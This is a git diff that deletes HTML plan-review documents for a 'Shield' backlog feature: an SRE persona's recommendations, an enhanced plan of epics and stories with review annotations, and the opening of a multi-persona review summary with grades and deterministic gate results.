-<td>Translated to &quot;can a future maintainer respond when reconciliation misbehaves.&quot; Partial: §14 gives a runbook-shaped recovery (git revert; disable eager prune; fall back to manual). EPIC-4-S2 commits to documenting capture/view/promote/remove + the three triggers + match key in the command and SKILL.md. Gaps: (a) the operator-facing <strong>diagnostic story is thin</strong> — when an entry wrongly vanishes, there's no documented &quot;how to tell <em>which</em> trigger removed it and why&quot; because the removal path doesn't log its rationale (see OP1). (b) &quot;disable eager prune&quot; is named as the mitigation but <strong>no mechanism</strong> for that toggle is specified anywhere in the plan/stories — it's an aspiration, not a shipped switch. (c) Owner is named (@ashwinimanoj, single maintainer) but there's no escalation analog and the manual-audit cadence is undefined.</td>
-</tr>
-</tbody>
-</table>
-<p><strong>Key Finding:</strong> The destructive path is thoughtfully de-risked by design (never-remove-on-doubt, staged M3-last rollout, git-revert recovery) — but the operational <em>instrumentation</em> around it is missing: successful removals aren't logged with rationale, the N2 latency budget has no measurement mechanism, and the §14 &quot;disable eager prune&quot; mitigation is named without any toggle actually being specified as a story.</p>
-<h4 id="recommendations">Recommendations</h4>
-<table>
-<thead>
-<tr>
-<th>Priority</th>
-<th>Point</th>
-<th>Recommendation</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>P1</td>
-<td>OP7</td>
-<td>Add a story (or task under EPIC-3-S3) for an explicit kill switch — a <code>.shield.json</code> flag (e.g. <code>backlog.auto_reconcile: false</code>) that disables eager prune and lazy sweep independently, leaving manual-remove only. §14 <em>names</em> this fallback as the rollback action but no story ships the toggle, so the documented mitigation is currently unactionable.</td>
-</tr>
-<tr>
-<td>P1</td>
-<td>OP1</td>
-<td>Make successful removals auditable, not just the doubt path. EPIC-3-S2/S3 should log every removal with <code>{entry id, feature, epic, match-kind (id vs name), triggering run, the plan.json path that gated it}</code>. Today only never-remove-on-doubt logs (N3); a confident-but-wrong removal leaves a git diff with no rationale — exactly the 3am case. Define the log destination/format too.</td>
-</tr>
-<tr>
-<td>P1</td>
-<td>OP4</td>
-<td>Close the uncommitted-state recovery gap. Eager prune fires automatically at end-of-<code>/plan</code>/<code>/implement</code>, potentially before <code>backlog.json</code> is committed — at which point <code>git revert</code> (N4) cannot recover the entry. Either (a) commit <code>backlog.json</code> before the destructive prune, or (b) write the pruned entry to a transient <code>.shield/backlog-removed.log</code> so it's recoverable independent of git.</td>
-</tr>
-<tr>
-<td>P1</td>
-<td>OP2 / OP5</td>
-<td>Instrument the N2 ~1s budget. The budget and its breach action (Q1 epic-index) are well-specified but unmeasurable — add lightweight timing to <code>/backlog</code> view (even a debug-gated stderr line) so &quot;revisit if breached&quot; is falsifiable. Without it, the only signal is a human noticing slowness.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>OP2 / OP7</td>
-<td>Give the manual audit a concrete cadence and trigger. §7 names threshold metrics (≥70% terminal, &lt;20% &gt;60d) but only &quot;periodic&quot; audit — specify <em>when</em> (e.g. monthly) and <em>what reading triggers action</em> so the single owner has an actual on-call procedure rather than an open-ended chore.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>OP4</td>
-<td>Add an eval that rehearses recovery: assert that after a (simulated) wrong removal, <code>git revert</code> / file-restore brings the entry back. EPIC-4-S1 covers remove/prune/sweep behavior but never exercises the recovery procedure N4 relies on — an untested restore path is a latent 3am surprise.</td>
-</tr>
-</tbody>
-</table>
-<p><strong>Overall persona grade: B</strong> (point grades: A, C, A, B, B, A, C → average 3.0 → B). The plan is operationally mature where it matters most — failure-mode analysis (OP3) and staged change management (OP6) are A-grade, and the destructive path is genuinely well-contained. It loses ground on day-2 <em>instrumentation</em>: removals aren't logged with rationale, the performance budget can't be measured, and the headline rollback mitigation (&quot;disable eager prune&quot;) is named but not shipped as a toggle.</p>
-
-</body>
-</html>
diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/enhanced-plan.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/enhanced-plan.html
deleted file mode 100644
index b3fdd559..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/enhanced-plan.html
+++ /dev/null
@@ -1,274 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="utf-8">
-<meta name="viewport" content="width=device-width, initial-scale=1">
-<title>Shield Plan Review</title>
-<style>
-  body{font:16px/1.6 -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;max-width:920px;margin:2rem auto;padding:0 1.2rem;color:#1b1f24}
-  h1,h2,h3{line-height:1.25;margin-top:1.6em}
-  h1{border-bottom:2px solid #e1e4e8;padding-bottom:.3em}
-  h2{border-bottom:1px solid #eaecef;padding-bottom:.2em}
-  code{background:#f3f4f6;padding:.12em .35em;border-radius:4px;font-size:.9em}
-  pre{background:#f6f8fa;padding:1em;border-radius:8px;overflow:auto}
-  pre code{background:none;padding:0}
-  table{border-collapse:collapse;width:100%;margin:1em 0}
-  th,td{border:1px solid #d0d7de;padding:.45em .7em;text-align:left;vertical-align:top}
-  th{background:#f6f8fa}
-  blockquote{border-left:4px solid #d0d7de;margin:1em 0;padding:.2em 1em;color:#57606a}
-  .meta{background:#fff8e6;border:1px solid #f0d999;border-radius:8px;padding:.6em 1em;font-size:.9em;color:#6a5500}
-</style>
-</head>
-<body>
-<div class="meta">Shield Plan Review · feature <code>backlog-20260527</code> · 2026-05-27 · rendered from markdown (source of truth in <code>reviews/plan/2026-05-27/</code>)</div>
-<h1 id="plan--shield-backlog">Plan — Shield Backlog</h1>
-<p><strong>Project:</strong> Shield · <strong>Phase:</strong> v1 · <strong>Domain:</strong> backend (Python)
-<strong>PRD:</strong> <a href="./prd.md"><code>./prd.md</code></a> (reviewed <strong>Ready</strong>, composite 3.1) · <strong>TRD:</strong> <a href="./trd.md"><code>./trd.md</code></a> · <strong>Sidecar:</strong> <code>./plan.json</code></p>
-<!-- [from: PM5] Add a 2–3 sentence plain-language executive summary atop trd.md and plan.md before the schema-/pipeline-heavy detail, for non-technical readers who hit these artifacts first. -->
-<p>A project-level Shield backlog: capture (user/agent) → user-driven promotion → reconciliation. Entries are removed when their work commits — eagerly at the end of a promoted <code>/plan</code> or <code>/implement</code> run, lazily on the <code>/backlog</code> view sweep, or manually. Matching is by feature (<code>manifest.json</code> index) + epic (<code>plan.json</code> gate); no ids are stamped.</p>
-<blockquote>
-<p><strong>Review note (P0 — gate 0d):</strong> Before this plan ships, paraphrase TRD §2 so it no longer
-restates PRD §3 verbatim (current 92-char overlap exceeds the 80-char duplication threshold).
-Summarize the problem in technical-framing terms and link to PRD §3 instead of repeating it.</p>
-<!-- [from: Deterministic gate 0d] -->
-</blockquote>
-<h2 id="milestones">Milestones</h2>
-<table>
-<thead>
-<tr>
-<th>ID</th>
-<th>Name</th>
-<th>Depends on</th>
-<th>Outcome</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>M1</td>
-<td>Capture + store + view</td>
-<td>—</td>
-<td><code>backlog.json</code> + schema/validator; capture (user + skill, atomic); <code>/backlog</code> ordered view with manifest status badges; manual remove.</td>
-</tr>
-<tr>
-<td>M2</td>
-<td>Feature + epic association + suggestion</td>
-<td>M1</td>
-<td>Every entry carries feature + epic (existing or proposed-new); agent suggests from manifest/plan; user accept/replace/create-new.</td>
-</tr>
-<tr>
-<td>M3</td>
-<td>Promotion + reconciliation</td>
-<td>M2</td>
-<td>Promotion via transient reference; reconciliation engine (match key, never-remove-on-doubt, drift tolerance); eager + lazy idempotent triggers; eval suite + version bump.</td>
-</tr>
-</tbody>
-</table>
-<hr />
-<h2 id="epic-1--store-schema--capture--m1">EPIC-1 — Store, schema &amp; capture  <em>(M1)</em></h2>
-<h3 id="epic-1-s1--define-backlogjson-schema-and-validator-high">EPIC-1-S1 · Define backlog.json schema and validator <em>(high)</em></h3>
-<p>Define <code>backlog.json</code> shape + JSON Schema with a top-level <code>schema_version</code>, plus a Python validator. Entry: <code>{id, order:int, kind∈{epic,story,task}, source∈{user,agent}, feature, epic, text}</code>. <code>schema_version</code> is set now so future shape changes migrate read-old/write-new.</p>
-<ul>
-<li><strong>Tasks:</strong> author <code>shield/schema/backlog.schema.json</code>; document entry shape + migration policy in <code>shield/skills/general/backlog/SKILL.md</code>; create <code>shield/scripts/validate_backlog.py</code>; ordering = single integer <code>order</code>.
-<ul>
-<li>
-<!-- [from: Backend P1-a] --> **Specify the `id` contract:** type (string), generation strategy (uuid4 / monotonic / slug — pick one and document it), and a schema-level **uniqueness** constraint across `entries[]`. Remove/promote/prune all key off `id`.
-</li>
-</ul>
-</li>
-<li><strong>AC:</strong> schema rejects unknown <code>kind</code> (named error); <code>validate_backlog.py</code> exits 0/non-zero correctly; <code>schema_version</code> + migration policy present; enums constrained.
-<ul>
-<li>
-<!-- [from: Backend P1-a] --> **+ AC:** schema rejects an `entries[]` array containing duplicate `id` values, naming the error.
-</li>
-<li>
-<!-- [from: Backend P2-c] --> Either add a no-op `migrate(doc) -> doc` seam with a unit test, **or** reword the migration AC to "migration *policy* documented (doc-only until schema_version 2)" so it isn't mistaken for working code.
-</li>
-</ul>
-</li>
-<li><strong>Design:</strong> §11 APIs Involved · LLD <code>backlog-store</code> (TODO) <!-- [from: Agile P2] land or stub /lld backlog-store before sprint so this design_ref resolves --></li>
-</ul>
-<h3 id="epic-1-s2--capture-entrypoint-user--skill-with-atomic-write-high">EPIC-1-S2 · Capture entrypoint (user + skill) with atomic write <em>(high)</em></h3>
-<p>Capture usable by the user (<code>/backlog add</code>) and any skill (documented write helper). Atomic temp-then-rename + validate-or-refuse so concurrent capture vs reconciliation can't corrupt the file. <em>Resolves PRD-review P1 (capture interface).</em></p>
-<ul>
-<li><strong>Tasks:</strong> <code>/backlog add</code> (assigns next <code>order</code>); skill-callable write helper (text, kind, feature?, epic?, source); atomic write; validate-or-refuse.
-<ul>
-<li>
-<!-- [from: Backend P1-b, DX P1] --> **Lock the write-helper signature here (do not defer to LLD):** pin name, module path, parameters, return type, and raise-on-invalid behavior — e.g. `capture(text, *, kind="task", feature=None, epic=None, source) -> entry_id` in `shield/scripts/backlog_store.py`. This is the carried-forward PRD-review P1 and the contract every capturing skill builds against; it cannot stay open as TRD §12 Q3.
-</li>
-<li>
-<!-- [from: Backend P1-c, Security P1] --> **Name the concurrency strategy.** Temp-then-rename prevents a *torn* file but not lost updates (two read-modify-writes → last-writer-wins drops an entry). Either document the single-writer assumption explicitly *next to* the N1 threat statement (N5 already says "single actor"), or implement a lockfile / re-read-and-merge / `O_EXCL` temp. Name the atomic primitive used (`os.replace`).
-</li>
-</ul>
-</li>
-<li><strong>AC:</strong> user + skill capture both work; interface documented; mid-write kill leaves no corruption; next <code>order</code>/default <code>kind</code> assigned.
-<ul>
-<li>
-<!-- [from: Security P1] --> **+ AC:** a malformed/partial `backlog.json` on read is **refused with a named error** (validate-or-refuse refusal path), never silently read or truncated.
-</li>
-</ul>
-</li>
-<li><strong>Design:</strong> §5 Functional Requirements · LLD <code>backlog-store</code> (TODO)</li>
-</ul>
-<h3 id="epic-1-s3--backlog-view--ordered-list-high">EPIC-1-S3 · /backlog view — ordered list <em>(high)</em></h3>
-<p><code>/backlog</code> command + skill rendering entries sorted by <code>order</code> with feature + epic + source.</p>
-<ul>
-<li><strong>Tasks:</strong> author <code>shield/commands/backlog.md</code> + <code>backlog/SKILL.md</code>; render sorted; empty-backlog message.</li>
-<li><strong>AC:</strong> ascending-<code>order</code> list with feature/epic/source; clean empty message; command registered.</li>
-<li><strong>Design:</strong> §4 Product Journey</li>
-</ul>
-<!-- [from: DX P2] Specify the badge render format once (EPIC-2-S1 shows 'research ✓ prd ✓ plan –' only as an example) and document a local-dev/dry-run loop in backlog SKILL.md. -->
-<h3 id="epic-1-s4--manual-remove-from-backlog-medium">EPIC-1-S4 · Manual remove from /backlog <em>(medium)</em></h3>
-<p><code>/backlog remove &lt;id&gt;</code> — plain delete for ideas decided against / entries no run will clear.</p>
-<ul>
-<li><strong>Tasks:</strong> <code>remove &lt;id&gt;</code> via atomic helper; confirm-before-delete; clear error on absent id.</li>
-<li><strong>AC:</strong> deletes + persists atomically; absent id = clear no-op error; no history retained.
-<ul>
-<li>
-<!-- [from: Security P2/SE3] --> Note (doc): `git revert` recoverability (N4) covers only entries that reached a commit; a manual remove of an *uncommitted* entry is unrecoverable by design.
-</li>
-</ul>
-</li>
-<li><strong>Design:</strong> §5 Functional Requirements</li>
-</ul>
-<hr />
-<h2 id="epic-2--association--pipeline-status">EPIC-2 — Association &amp; pipeline status</h2>
-<h3 id="epic-2-s1--per-entry-pipeline-status-from-manifestjson-high-m1">EPIC-2-S1 · Per-entry pipeline status from manifest.json <em>(high, M1)</em></h3>
-<p><code>/backlog</code> view shows each entry's feature pipeline status (research/prd/plan) read live from <code>manifest.json</code> — so &quot;prd done, not yet planned&quot; is visible without removal.</p>
-<ul>
-<li><strong>Tasks:</strong> read manifest; render status badges per entry; <code>not started</code> when feature absent; compute at view time (no stored status).</li>
-<li><strong>AC:</strong> badges derived from manifest; prd-but-no-plan shows <code>prd ✓ plan –</code> and stays; absent feature → <code>not started</code>.</li>
-<li><strong>Design:</strong> §7 High-Level Design</li>
-</ul>
-<h3 id="epic-2-s2--feature--epic-association--agent-suggestion-high-m2">EPIC-2-S2 · Feature + epic association + agent suggestion <em>(high, M2)</em></h3>
-<p>Associate every entry with a feature (reconciliation key) + epic (removal gate), either proposed-new; agent suggests feature (manifest) + epic (plan.json); user accept/replace/create-new.</p>
-<ul>
-<li><strong>Tasks:</strong> prompt/accept feature + epic (allow proposed-new); suggest by scanning manifest + candidate plan.json; never block capture.
-<ul>
-<li>
-<!-- [from: DX P1, Agile P1, Backend P2-b] --> **Define the suggestion + match heuristic concretely** (no "best match" hand-wave): the matching method (e.g. case-insensitive, whitespace-normalized substring + token-overlap ranking on feature/epic names), the tie-break/ambiguity rule (→ entry stays, never auto-pick on a tie), and epic-rename behavior. Resolve PRD §9's open "discovery cost" question or land `/lld epic-suggester`.
-</li>
-</ul>
-</li>
-<li><strong>AC:</strong> every entry has feature + epic; ≥1 feature + ≥1 epic candidate proposed when matches exist; capture succeeds with proposed-new when none.
-<ul>
-<li>
-<!-- [from: Agile P1] --> **+ measurable AC:** given a fixture manifest with feature `auth`, capturing text mentioning "auth" surfaces `auth` as the top candidate; a 2-way name tie surfaces both and auto-picks neither.
-</li>
-</ul>
-</li>
-<li><strong>Design:</strong> §5 Functional Requirements · LLD <code>epic-suggester</code> (TODO)</li>
-</ul>
-<hr />
-<h2 id="epic-3--promotion--reconciliation--m3">EPIC-3 — Promotion &amp; reconciliation  <em>(M3)</em></h2>
-<h3 id="epic-3-s1--user-driven-promotion-with-transient-reference-high">EPIC-3-S1 · User-driven promotion with transient reference <em>(high)</em></h3>
-<p><code>/backlog promote &lt;id&gt;</code> launches the user-chosen step (<code>/research</code>/<code>/prd</code>/<code>/plan</code>/<code>/implement</code>) and passes the entry id as a transient runtime reference — never stamped into <code>plan.json</code>.</p>
-<ul>
-<li><strong>Tasks:</strong> <code>promote &lt;id&gt;</code> affordance; forward id as transient reference; document non-persistence; shippable work routes through <code>/plan</code>, direct <code>/implement</code> for rare planless one-offs.</li>
-<li><strong>AC:</strong> promotion starts the chosen step + forwards the reference; reference not persisted to plan.json/stories; tool never auto-routes.</li>
-<li><strong>Design:</strong> §4 Product Journey</li>
-</ul>
-<!-- [from: DX P2] Add an explicit intra-epic dependency note: EPIC-3-S3 (triggers) consumes both EPIC-3-S1 (transient reference) and EPIC-3-S2 (engine) and must land after them. -->
-<h3 id="epic-3-s2--reconciliation-engine-match-key--never-remove-on-doubt-high">EPIC-3-S2 · Reconciliation engine (match key + never-remove-on-doubt) <em>(high)</em></h3>
-<p>Locate feature in <code>manifest.json</code>; if it has a <code>plan.json</code>, check the entry's epic. Match: existing epic → by id; proposed-new → by epic name. Ambiguity/no-match → entry stays. Unknown manifest/plan shapes → doubt (stays), never crash.</p>
-<ul>
-<li><strong>Tasks:</strong> <code>shield/scripts/reconcile_backlog.py</code>; match key impl; never-remove-on-doubt; drift tolerance with logged warning.
-<ul>
-<li>
-<!-- [from: Backend P2-a] --> **State the "epic landed" gate as one precise predicate** and use it everywhere: "an entry is removed when an epic with the matching id (existing) or normalized name (proposed-new) is **present in `plan.json.epics[]`**; story `status` is **not** consulted." F7, the EPIC-3-S2 AC, and the schema currently word this three ways.
-</li>
-<li>
-<!-- [from: SRE P1/OP1] --> **Log every removal with rationale** to a defined destination/format: `{entry id, feature, epic, match-kind (id|name), triggering run, gating plan.json path}`. Today only the never-remove-on-doubt path logs (N3); a confident-but-wrong removal must not be a silent git diff.
-</li>
-</ul>
-</li>
-<li><strong>AC:</strong> plan-committed epic selected for removal, prd-only not; id/name match per case; malformed/old shapes → entry stays (logged), no exception.
-<ul>
-<li>
-<!-- [from: Security P2] --> **+ fixture/AC:** epic-name collision across two different features → ambiguous → entry stays (the one place a wrong removal is plausible; PRD §10 risk / §14 trigger).
-</li>
-</ul>
-</li>
-<li><strong>Design:</strong> §7 High-Level Design · LLD <code>reconciler</code> (TODO)</li>
-</ul>
-<h3 id="epic-3-s3--eager--lazy-removal-triggers-idempotent-high">EPIC-3-S3 · Eager + lazy removal triggers (idempotent) <em>(high)</em></h3>
-<p>Eager prune at end of promoted <code>/plan</code>/<code>/implement</code> (via the transient reference); lazy sweep on <code>/backlog</code> view. Both idempotent; both call the one reconciliation engine.</p>
-<ul>
-<li><strong>Tasks:</strong> eager prune hook at end of <code>/plan</code> + <code>/implement</code>; lazy sweep on view; idempotent remove-if-present; shared engine.
-<ul>
-<li>
-<!-- [from: SRE P1/OP7] --> **Ship the kill switch.** Add a `.shield.json` flag (e.g. `backlog.auto_reconcile: false`) that disables eager prune and lazy sweep **independently**, leaving manual-remove only. §14 names this as the rollback fallback but no story currently delivers it — without it the documented mitigation is unactionable.
-</li>
-<li>
-<!-- [from: SRE P1/OP4] --> **Close the uncommitted-state recovery gap.** Eager prune fires at end-of-run, possibly before `backlog.json` is committed, so `git revert` (N4) can't recover. Either commit `backlog.json` before the destructive prune, or append pruned entries to a transient `.shield/backlog-removed.log`.
-</li>
-<li>
-<!-- [from: SRE P1/OP2,OP5] --> **Instrument the N2 ~1s budget.** Add a debug-gated latency line to `/backlog` view so "revisit if breached" (Q1 epic-index) is falsifiable, not "a human notices slowness."
-</li>
-</ul>
-</li>
-<li><strong>AC:</strong> promotion removes referenced entry at end of run (eager); sweep removes plan-committed entries (lazy); second pass is a no-op (idempotent); shared engine.</li>
-<li><strong>Design:</strong> §7 High-Level Design · LLD <code>reconciler</code> (TODO)</li>
-</ul>
-<hr />
-<h2 id="epic-4--eval-coverage--release--m3">EPIC-4 — Eval coverage &amp; release  <em>(M3)</em></h2>
-<h3 id="epic-4-s1--executable-evals-for-the-backlog-lifecycle-redgreen-high">EPIC-4-S1 · Executable evals for the backlog lifecycle (RED→GREEN) <em>(high)</em></h3>
-<p>Per CLAUDE.md eval mandate: cover capture (user + skill), view + status, manual remove, eager prune, lazy sweep, match-key, never-remove-on-doubt.</p>
-<ul>
-<li><strong>Tasks:</strong> fixtures (prd-only-stays, plan-committed-removed, ambiguous-stays, malformed-stays); evals for each behavior; wire into CI; capture RED + GREEN in PR.
-<ul>
-<li>
-<!-- [from: Backend P1-c, Security P1] --> **+ concurrency eval:** two interleaved captures (and a capture racing a reconciliation write) against the same `backlog.json` assert no corruption **and no lost entry** — the actual N1 threat, distinct from the crash-mid-write test.
-</li>
-<li>
-<!-- [from: Security P1] --> **+ no-stamping eval (F6):** after promotion via `/plan`/`/implement`, assert `plan.json` and story records are **byte-unchanged**. F6 is the load-bearing trust boundary and is currently absent from the eval coverage list.
-</li>
-<li>
-<!-- [from: SRE P2] --> **+ recovery-rehearsal eval:** after a simulated wrong removal, assert `git revert` / file-restore brings the entry back (exercises the N4 recovery path the plan relies on).
-</li>
-<li>
-<!-- [from: DX P2] --> Name the CI entrypoint explicitly (which runner under `shield/evals/`) and the path-filter glob scoping "backlog assets" (e.g. `shield/{schema,scripts,skills/general/backlog}/**`, `shield/commands/backlog.md`).
-</li>
-</ul>
-</li>
-<li><strong>AC:</strong> eval suite under <code>shield/evals/</code> covers all behaviors; self-contained (no API/LLM); PR body has RED + GREEN; CI runs on backlog-asset PRs.</li>
-<li><strong>Design:</strong> §10 Milestones</li>
-</ul>
-<h3 id="epic-4-s2--version-bump--commandskill-docs-medium">EPIC-4-S2 · Version bump + command/skill docs <em>(medium)</em></h3>
-<p>Bump the Shield plugin version (marketplace.json + pyproject where touched) in the same commit as asset changes; finalize <code>/backlog</code> + backlog SKILL.md docs.</p>
-<ul>
-<li><strong>Tasks:</strong> bump <code>marketplace.json</code>; bump touched <code>pyproject.toml</code>; finalize command/skill docs (capture, triggers, match key, manual remove, badges); CHANGELOG.
-<ul>
-<li>
-<!-- [from: Agile P2] --> Add explicit DoD lines: "PR reviewed and merged" and "marketplace version published" so 'done' is unambiguous.
-</li>
-<li>
-<!-- [from: SRE P2] --> Document the manual `/backlog` audit cadence (e.g. monthly) and which §7 reading triggers action — the single owner needs a concrete on-call procedure, not "periodic."
-</li>
-</ul>
-</li>
-<li><strong>AC:</strong> version bumped in same commit; command + SKILL document capture/view/promote/remove + 3 triggers; CHANGELOG mentions the feature.</li>
-<li><strong>Design:</strong> §13 References</li>
-</ul>
-<hr />
-<h2 id="pre-build-action-validate-the-bet-p1--pm10">Pre-build action: validate the bet <em>(P1 — PM10)</em></h2>
-<!-- [from: PM10] -->
-<p>Before committing all four milestones, capture a rough baseline of lost / re-derived future-work
-items over a recent week of Shield usage (from git history or chat logs) to ground the
-operational-savings claim. The PRD itself (§10) flags this as the load-bearing <strong>unvalidated</strong>
-assumption; a cheap baseline now de-risks the whole investment and seeds the §7 success metric.</p>
-<hr />
-<h2 id="carried-forward-from-prd-review-ready-run-_2">Carried forward from PRD-review (Ready, run _2)</h2>
-<ul>
-<li>Capture-from-skill interface defined → <strong>EPIC-1-S2</strong> / TRD §11. <em>(Review note: still open as TRD §12 Q3 — P1 #1 closes it.)</em></li>
-<li><code>backlog.json</code> <code>schema_version</code> + migration → <strong>EPIC-1-S1</strong> / TRD §9.</li>
-<li>Reconciliation read-contract drift tolerance → <strong>EPIC-3-S2</strong> / TRD §6 N3.</li>
-<li>Eager-prune + lazy-sweep idempotency → <strong>EPIC-3-S3</strong> / TRD §5 F8.</li>
-</ul>
-<h2 id="next-steps">Next steps</h2>
-<ul>
-<li><code>/pm-sync</code> — sync epics + stories to ClickUp.</li>
-<li><code>/implement</code> — begin TDD implementation (start at M1 / EPIC-1-S1 once the P0 doc-fix and the EPIC-1 P1s are folded in).</li>
-</ul>
-
-</body>
-</html>
diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/summary.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/summary.html
deleted file mode 100644
index f3c13635..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/summary.html
+++ /dev/null
@@ -1,235 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="UTF-8" />
-<meta name="viewport" content="width=device-width, initial-scale=1.0" />
-<title>Review — backlog-20260527</title>
-<link rel="stylesheet" href="../../../../../shield.css" />
-<script defer src="../../../../../manifest.js"></script>
-<script defer src="../../../../../shield-nav.js"></script>
-<script type="module">
-  import mermaid from "https://cdn.jsdelivr.net/npm/mermaid@10/dist/mermaid.esm.min.mjs";
-  mermaid.initialize({ startOnLoad: false, theme: "default" });
-  document.addEventListener("DOMContentLoaded", () => mermaid.run({ querySelector: "pre.mermaid" }));
-</script>
-</head>
-<body data-shield-root="../../../../../">
-<header class="shield-header">
-  <a class="brand" href="../../../../../index.html">🛡 Shield</a>
-  <span class="bar-sep">|</span>
-  <nav class="crumb" id="shield-crumb"></nav>
-  <span class="bar-spacer"></span>
-  <div class="feat-wrap">
-    <button class="feat-btn" id="docs-toggle" aria-expanded="false">Features ▾</button>
-    <div class="feat-panel" id="docs-panel">
-      <input class="docs-search" id="docs-search" placeholder="Search docs…  (⌘K)" autocomplete="off" />
-      <div id="docs-results"></div>
-    </div>
-  </div>
-</header>
-<main class="shield-main">
-
-<nav class="toc">
-<div class="toc-title">Contents</div>
-<ul>
-<li><a href="#score-summary">Score Summary</a>
-</li>
-<li><a href="#deterministic-trd-gates-run-before-persona-dispatch">Deterministic TRD Gates (run before persona dispatch)</a>
-</li>
-<li><a href="#consolidated-recommendations">Consolidated Recommendations</a>
-<ul>
-<li><a href="#p0--must-fix-blocks-sprint-planning">P0 — Must Fix (blocks sprint planning)</a></li>
-<li><a href="#p1--should-fix-plan-quality">P1 — Should Fix (plan quality)</a></li>
-<li><a href="#p2--nice-to-have">P2 — Nice to Have</a></li>
-</ul>
-</li>
-<li><a href="#detailed-agent-findings">Detailed Agent Findings</a>
-</li>
-</ul>
-</nav>
-<h1 id="plan-review--shield-backlog">Plan Review — Shield Backlog</h1>
-<p><strong>Date:</strong> 2026-05-27
-<strong>Plan:</strong> <code>docs/shield/backlog-20260527/</code> (plan.md + trd.md + plan.json)
-<strong>Source PRD:</strong> prd.md (type: lean) · prior PRD-review: <code>reviews/prd/2026-05-27_2</code> (Ready, 3.12)
-<strong>Reviewers:</strong> DX Engineer, Agile Coach, Backend Engineer, Security Engineer, SRE, Product Manager (PM1–PM10)
-<strong>Composite Score:</strong> <strong>B (3.14) — Ready</strong> · <strong>1 P0</strong> (deterministic gate) · 12 P1 · 13 P2</p>
-<blockquote>
-<p><strong>Verdict: Ready, pending one P0 doc-fix.</strong> The plan is well-structured, MVP-disciplined, and
-error-handling-first; the milestone DAG is acyclic and fully covered; the reconciliation
-read-contract was <em>verified accurate</em> against the live <code>manifest.json</code>/<code>plan-sidecar.schema.json</code>.
-The single P0 is a cheap one-line paraphrase (TRD §2 restates PRD §3 verbatim). The 12 P1s
-cluster around four real gaps the implementers should close first: the <strong>skill write-helper
-signature is still open</strong>, <strong>atomicity is conflated with isolation</strong> (lost-update path), the
-<strong>match heuristic is undefined</strong>, and several <strong>load-bearing guarantees lack tests / shipped
-toggles</strong> (F6 no-stamping, validate-or-refuse, the §14 kill switch, removal audit logging).</p>
-</blockquote>
-<h2 id="score-summary">Score Summary</h2>
-<table>
-<thead>
-<tr>
-<th>Persona</th>
-<th style="text-align:center">Weight</th>
-<th style="text-align:center">Grade</th>
-<th>Key Finding</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>DX Engineer</td>
-<td style="text-align:center">1.0</td>
-<td style="text-align:center">B (3.4)</td>
-<td>Clear &amp; sound, but 3 <code>design_refs</code> point at non-existent LLDs and the capture-helper signature is deferred</td>
-</tr>
-<tr>
-<td>Agile Coach</td>
-<td style="text-align:center">0.7</td>
-<td style="text-align:center">B (3.36)</td>
-<td>Sprint-ready with an acyclic, fully-covered DAG; only EPIC-2-S2's match heuristic is not estimable</td>
-</tr>
-<tr>
-<td>Backend Engineer</td>
-<td style="text-align:center">1.0</td>
-<td style="text-align:center">B (3.33)</td>
-<td>Read-contract verified accurate; held back by open helper signature + atomicity≠isolation</td>
-</tr>
-<tr>
-<td>Security Engineer</td>
-<td style="text-align:center">1.0</td>
-<td style="text-align:center">B (3.05)</td>
-<td>Sound for local single-actor tooling; N1 race + F6 no-stamping asserted but untested</td>
-</tr>
-<tr>
-<td>SRE</td>
-<td style="text-align:center">0.7</td>
-<td style="text-align:center">B (3.0)</td>
-<td>Failure-mode analysis &amp; staged rollout are A-grade; day-2 instrumentation is thin</td>
-</tr>
-<tr>
-<td>Product Manager</td>
-<td style="text-align:center">0.7</td>
-<td style="text-align:center"><strong>A (3.7)</strong></td>
-<td>Strong on impact/scope/prioritization/reversibility; PM10 business-value baseline unvalidated (C)</td>
-</tr>
-</tbody>
-</table>
-<p><strong>Composite</strong> = (3·1.0 + 3·0.7 + 3·1.0 + 3·1.0 + 3·0.7 + 4·0.7) / 5.1 = <strong>3.14 → B — Ready</strong></p>
-<h2 id="deterministic-trd-gates-run-before-persona-dispatch">Deterministic TRD Gates (run before persona dispatch)</h2>
-<table>
-<thead>
-<tr>
-<th>Gate</th>
-<th>Rule</th>
-<th>Result</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>0a</td>
-<td>Schema validation (<code>validate_plan.py</code>)</td>
-<td>✅ PASS (exit 0)</td>
-</tr>
-<tr>
-<td>0b</td>
-<td>TRD 14-section presence (<code>validate_trd.py</code>)</td>
-<td>✅ PASS (exit 0)</td>
-</tr>
-<tr>
-<td>0c</td>
-<td>Stale-anchor on <code>design_refs[]</code></td>
-<td>✅ PASS — all <code>trd.md#…</code> anchors live; <code>lld</code> refs have null anchors (intentional TODO)</td>
-</tr>
-<tr>
-<td>0d</td>
-<td>PRD↔TRD duplication (&gt;80-char overlap)</td>
-<td>❌ <strong>FAIL → P0</strong> — TRD §2 restates PRD §3 with a <strong>92-char</strong> verbatim overlap</td>
-</tr>
-<tr>
-<td>0e</td>
-<td>Implementation-manual (§7 fence &gt;20 lines)</td>
-<td>✅ PASS — §7 is a 13-line ASCII diagram, not code</td>
-</tr>
-</tbody>
-</table>
-<h2 id="consolidated-recommendations">Consolidated Recommendations</h2>
-<h3 id="p0--must-fix-blocks-sprint-planning">P0 — Must Fix (blocks sprint planning)</h3>
-<ol>
-<li><strong>[Gate 0d] Paraphrase TRD §2 so it no longer restates PRD §3 verbatim.</strong> The opening sentence shares a 92-char run (<code>&quot; — during /research, while writing a PRD, mid-/plan, and especially during /implement &quot;</code>) with PRD §3, exceeding the 80-char duplication threshold. Rewrite TRD §2 to <em>summarize</em> the problem in technical-framing terms and link to PRD §3 rather than repeating it. (One-line fix; mechanical.)</li>
-</ol>
